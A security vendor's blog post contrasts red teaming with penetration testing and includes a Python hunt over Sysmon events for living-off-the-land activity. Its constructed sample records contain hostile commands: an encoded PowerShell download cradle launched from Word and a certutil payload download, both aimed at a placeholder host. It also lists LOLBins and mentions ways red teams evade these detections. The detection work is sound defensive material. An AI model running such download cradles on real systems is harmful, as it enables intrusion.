The “battle” for the security of your digital assets is an ongoing effort to stay ahead of cyber criminals, hackers and assorted bad actors. Thinking of security as a “battle” or “military incursion” also encourages borrowing techniques from other fields, and one such borrowing is war-gaming the security infrastructure through Red Teams.
What Is A Red Team Assessment And Why Should You Care?
The entire premise of red teaming is to play the role of an attacker in order to make your team better at defense. A CSO Online article offers this description of red teams:
“Red teams are external entities brought in to test the effectiveness of a security program. They are hired to emulate the behaviors and techniques of likely attackers to make it as realistic as possible.
For example, this team may try and get into a business building by pretending to be a delivery driver in order to plant a device for easy outside access (think port 80, 443, 53 for HTTP, HTTPS or DNS respectively). They may also try social engineering, phishing, vishing or simply posing as a company employee.”
The article goes on to say:
“The ultimate aim of such a test is to test an organization’s security maturity as well as its ability to detect and respond to an attack. Such an exercise could take up to three or four weeks depending on the simulation, the people involved and the attacks being tested.”
But isn’t this exactly why we have been doing penetration testing and security assessments for years? What is new?
The Role Of Penetration Testing In Red Teaming
There is definitely confusion about the differences between Red Teaming and Penetration Testing. According to a Security Intelligence article titled “Penetration Testing Versus Red Teaming: Clearing the Confusion”:
“Similar to scenario-based penetration tests, red team engagements are designed to achieve specific goals, such as gaining access to a sensitive server or business-critical application.
Red teaming projects differ in that they are heavily focused on emulating an advanced threat actor using stealth, subverting established defensive controls and identifying gaps in the organization’s defensive strategy.
The value of this type of engagement can be derived from a better understanding of how an organization detects and responds to real-world attacks.”
The article goes on to offer:
“Red team exercises typically focus on living off the land, relying on existing tools that are already built into the operating system. We strive to only use tooling when the team is confident it can help to evade or bypass endpoint detection and response solutions or avoid common threat hunting queries by dedicated teams focused on finding nefarious activities through PowerShell/Sysmon/event logs.
During a red team engagement, the team is more focused on targeting DevOps and end users and using the least obvious ways to gain the minimum elevated privileges required to achieve its objectives.”
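As an added example (not code from the original article, nor from the Security Intelligence piece quoted above), here is what one of the “common threat hunting queries” over Sysmon and PowerShell telemetry that the quote mentions looks like from the defender’s side: a small Python hunt over Sysmon process-creation (Event ID 1) records that flags LOLBin execution, Office applications spawning a shell, and Base64-encoded PowerShell, decoding the encoded payload so an analyst can read it. The event records and the example.invalid URLs are constructed for this example; the field names follow Sysmon’s Image, ParentImage and CommandLine, reduced to what the rules need.

```python
"""Hunt for living-off-the-land activity in Sysmon process-creation (Event ID 1) records.

Added example, not code from the original article. The events at the bottom are
constructed Sysmon Event ID 1 records, reduced to the fields the rules need.
"""
import base64
import json
import re
from typing import Dict, List, Optional

# Built-in Windows binaries that attackers commonly repurpose (download, execute, proxy).
LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "bitsadmin.exe",
           "wmic.exe", "msiexec.exe", "cscript.exe", "wscript.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match the prefix family rather than the full switch name.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")


def encode_for_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply three hunting rules to Sysmon Event ID 1 records and return the findings."""
    findings = []
    for ev in events:
        image, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])
        cmd = ev.get("CommandLine", "")
        # Rule 1: an Office application launching a shell is a classic macro stager.
        if parent in OFFICE_PARENTS and image in SHELLS:
            findings.append({"rule": "office_spawned_shell", "severity": "high",
                             "image": image, "detail": f"{parent} -> {cmd}"})
        # Rule 2: encoded PowerShell; surface the decoded script, not the Base64 blob.
        if image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                findings.append({"rule": "encoded_powershell", "severity": "high",
                                 "image": image, "detail": decoded})
        # Rule 3: any LOLBin execution is worth a look; noisy, so only medium severity.
        if image in LOLBINS:
            findings.append({"rule": "lolbin_execution", "severity": "medium",
                             "image": image, "detail": cmd})
    return findings


# Constructed sample records: one benign, one macro-to-PowerShell stager, one certutil download.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + encode_for_powershell(
                        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')")},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/payload.bin payload.bin"},
]

if __name__ == "__main__":
    print(json.dumps(hunt(SAMPLE_EVENTS), indent=2))
```

Run against the three constructed records, the hunt ignores notepad.exe and raises three findings: the Word-to-PowerShell parent/child pair, the decoded download cradle, and the certutil download. These are exactly the queries a red team works to stay under (for example by avoiding -EncodedCommand and by launching from a parent the hunt does not consider suspicious), whereas a conventional penetration test never exercises these detections at all, which is the gap the quote describes.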
A red team takes the least obvious path to its objective and avoids exhaustive, noisy enumeration, so it will not catalogue every weakness in a given application or network. Because this approach does leave the potential for undiscovered vulnerabilities, it is also necessary to perform specific security assessments targeted at applications, networks, mobile, IoT, cloud and cloud native targets.
Whether vulnerabilities are uncovered by red teaming or penetration testing, all security threat assessments should go beyond identifying security defects. They should focus on helping you meaningfully triage and fix vulnerabilities discovered during testing. What is needed is exceptional remediation advice that is specific, actionable, and aimed at reducing engineering overhead typically associated with mitigating security issues.
So, the best advice is to use red teaming and penetration testing in concert with one another. It is not a question of either/or; it is a question of both, and when.
A comprehensive strategy for protecting all technology assets will require a DevSecOps view that includes security assessments, developer training and a red team strategy. Establishing a relationship with a proven and trusted partner will further ensure success.
nVisium empowers organizations to eliminate application and cloud security vulnerabilities before cyber threats exploit them with proven in-depth security assessments, remediation and training programs. Our experienced team of security-savvy developers and engineers guide organizations to build best practices with high ROI into their engineering and secure development lifecycles across applications, operating systems, networks, mobile, cloud and IoT through services, software solutions and R&D unique to business operations and compliance initiatives. Additionally, nVisium provides a fully managed platform for tracking and measuring performance as well as instructor-led and online training.
Call us when you are ready to add security assessments to your red team strategy or, better yet, schedule a consultation today or download our new eBook titled “Demystifying DevSecOps” to get started yourself.